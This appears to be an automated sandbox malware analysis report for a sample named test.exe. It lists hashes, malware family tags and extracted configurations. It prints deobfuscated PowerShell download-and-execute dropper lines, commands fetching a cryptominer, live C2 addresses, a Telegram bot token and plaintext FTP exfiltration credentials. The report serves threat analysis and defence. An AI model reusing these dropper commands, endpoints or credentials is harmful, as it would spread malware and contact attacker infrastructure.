Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

test.exe

windows11-21h2-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    test.exe

  • Size

    14.3MB

  • Sample

    250319-d3t2ya1yf1

  • MD5

    8a44ee98217bc81f0869d793eefab1f0

  • SHA1

    4756ed10cbf5dbad09746a8fa2c2e62c2f2b7200

  • SHA256

    c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed

  • SHA512

    4f18f54d791929cb24c02e8865d520e6263c096bef7ebd422578bca0600cadb6ea4b046654ef007ba056bf568ff3a19b068bf4313b4a218953a5bd2ecb0e6a02

  • SSDEEP

    393216:vOWd863huc1dQJlAwF3MnG3InVFedWm7NS/xHWgnHz:2893hr1dQ53MG4VAHsT

Score
10/10
agentteslaammyyadminasyncratlokibotlummameduzamodiloadernjratquasarvidarvipkeyloggerxwormdefaultf083f1f6fa006fbbc744aa9888fb3e8aoffice04sigortatiktokcredential_accessdefense_evasiondiscoveryexecutionkeyloggerprivilege_escalationpyinstallerratspywarestealertrojanupxvmprotect

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$ex8 = "ject Net.WebCli"
3
$ex5 = "ent).Down"
4
$ex10 = "(New-Ob"
5
$ex18 = "loadString('http://92.255.85.66/a.mp4')"
6
$x = invoke-expression "(New-Object Net.WebClient).DownloadString('http://92.255.85.66/a.mp4')"|invoke-expression
7
8
# powershell snippet 1
9
(new-object net.webclient).downloadstring("http://92.255.85.66/a.mp4")
10
URLs
ps1.dropper

http://92.255.85.66/a.mp4

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$rx61 = "ject Net.WebCli"
3
$rx49 = "ent).Down"
4
$rx19 = "(New-Ob"
5
$rx77 = "loadString('http://92.255.57.221/a.mp4')"
6
$x = invoke-expression "(New-Object Net.WebClient).DownloadString('http://92.255.57.221/a.mp4')"|invoke-expression
7
8
# powershell snippet 1
9
(new-object net.webclient).downloadstring("http://92.255.57.221/a.mp4")
10
URLs
ps1.dropper

http://92.255.57.221/a.mp4

Extracted

Language
ps1
Deobfuscated
1
$wc = new-object system.net.webclient
2
$wc.downloadfile("http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys", "C:\\Users\\Admin\\c3pool\\WinRing0x64.sys")
3
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys

Extracted

Language
ps1
Deobfuscated
1
$wc = new-object system.net.webclient
2
$wc.downloadfile("http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json", "C:\\Users\\Admin\\c3pool\\config.json")
3
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json

Extracted

Language
ps1
Deobfuscated
1
$wc = new-object system.net.webclient
2
$wc.downloadfile("http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe", "C:\\Users\\Admin\\c3pool\\xmrig.exe")
3
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe

Extracted

Language
ps1
Deobfuscated
1
$wc = new-object system.net.webclient
2
$wc.downloadfile("http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe", "C:\\Users\\Admin\\c3pool\\nssm.exe")
3
URLs
exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe

Extracted

Family

xworm

Version

5.0

C2

92.255.85.2:4372

92.255.57.221:4414

116.250.190.209:4567

92.255.85.66:7000

178.173.236.10:7000

127.0.0.1:7000
Mutex

bFh8cGGVyBJ2hXxI

Attributes
  • install_file

    USB.exe

aes.plain
1
9v2dudD5rEHuQVreZRHaZA==
aes.plain
1
uYupww/sw+IGL1B9UruAfA==
aes.plain
1
cgTvd19QUOmd64/Mtyss1A==
aes.plain
1
wkx68kU0Sfs68dC2cbalMg==
aes.plain
1
VO/93dcBf6erbIqNrOz4EA==
aes.plain
1
V6msw5Nfs+5TrYHI1+Irdw==

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://176.65.144.3
  • Port:
    21
  • Username:
    Believe
  • Password:
    Believe56@@

Extracted

Family

vidar

Version

13.2

Botnet

f083f1f6fa006fbbc744aa9888fb3e8a

C2

https://t.me/g_etcontent

https://steamcommunity.com/profiles/76561199832267488
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0

Extracted

Family

lumma

C2

https://phygcsforum.life/api

https://0explorebieology.run/api

https://gadgethgfub.icu/api

https://84moderzysics.top/api

https://techmindzs.live/api

https://ucodxefusion.top/api

https://techspherxe.top/api

https://-earthsymphzony.today/api

https://absoulpushx.life/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://9modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://.cocjkoonpillow.today/api

https://zfeatureccus.shop/api

https://mrodularmall.top/api

Extracted

Family

vipkeylogger

C2

https://api.telegram.org/bot7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o/sendMessage?chat_id=6163418482

Extracted

Family

quasar

Version

176.65.144.14:4567;

Botnet

tiktok

C2

https://pastebin.com/raw/5KMaxFkV

Mutex

6b91ceb8-fdf6-44ae-8d03-cf7d52a55ba9

Attributes
  • encryption_key

    6DB4822E80CF23FD4665B760183906FE57378512

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Chrome Updated

  • subdirectory

    SubDir

Extracted

Family

lokibot

C2

http://bauxx.xyz/mtk1/w2/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

asyncrat

Version

A 13

Botnet

Default

C2

163.172.125.253:333

Mutex

AsyncMutex_555223

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
HnPfeFjKVRhCBNV6iN1GKQsEOU3LOTny

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

127.0.0.1:4782

Mutex

978b297b-bd79-47da-aff5-5421661f9499

Attributes
  • encryption_key

    0DDB9B0261808BADD198F8317E24CEF19CD13885

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

quasar

Version

1.3.0.0

Botnet

sigorta

C2

213.238.177.46:1604

Mutex

QSR_MUTEX_dxT1m3RtSBLlUoRqXL

Attributes
  • encryption_key

    AZfjKXCnqT1oHdxEyyKo

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Targets

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Persistence

Create or Modify System Process

1
T1543

Windows Service

1
T1543.003

Modify Authentication Process

1
T1556

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Privilege Escalation

Access Token Manipulation

1
T1134

Create Process with Token

1
T1134.002

Create or Modify System Process

1
T1543

Windows Service

1
T1543.003

Scheduled Task/Job

1
T1053

Scheduled Task

1
T1053.005

Defense Evasion

Access Token Manipulation

1
T1134

Create Process with Token

1
T1134.002

Hide Artifacts

2
T1564

Hidden Files and Directories

2
T1564.001

Impair Defenses

1
T1562

Disable or Modify System Firewall

1
T1562.004

Modify Authentication Process

1
T1556

Credential Access

Modify Authentication Process

1
T1556

Steal Web Session Cookie

1
T1539

Discovery

Remote System Discovery

1
T1018

System Information Discovery

1
T1082

System Network Configuration Discovery

1
T1016

Internet Connection Discovery

1
T1016.001

Lateral Movement

Collection

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.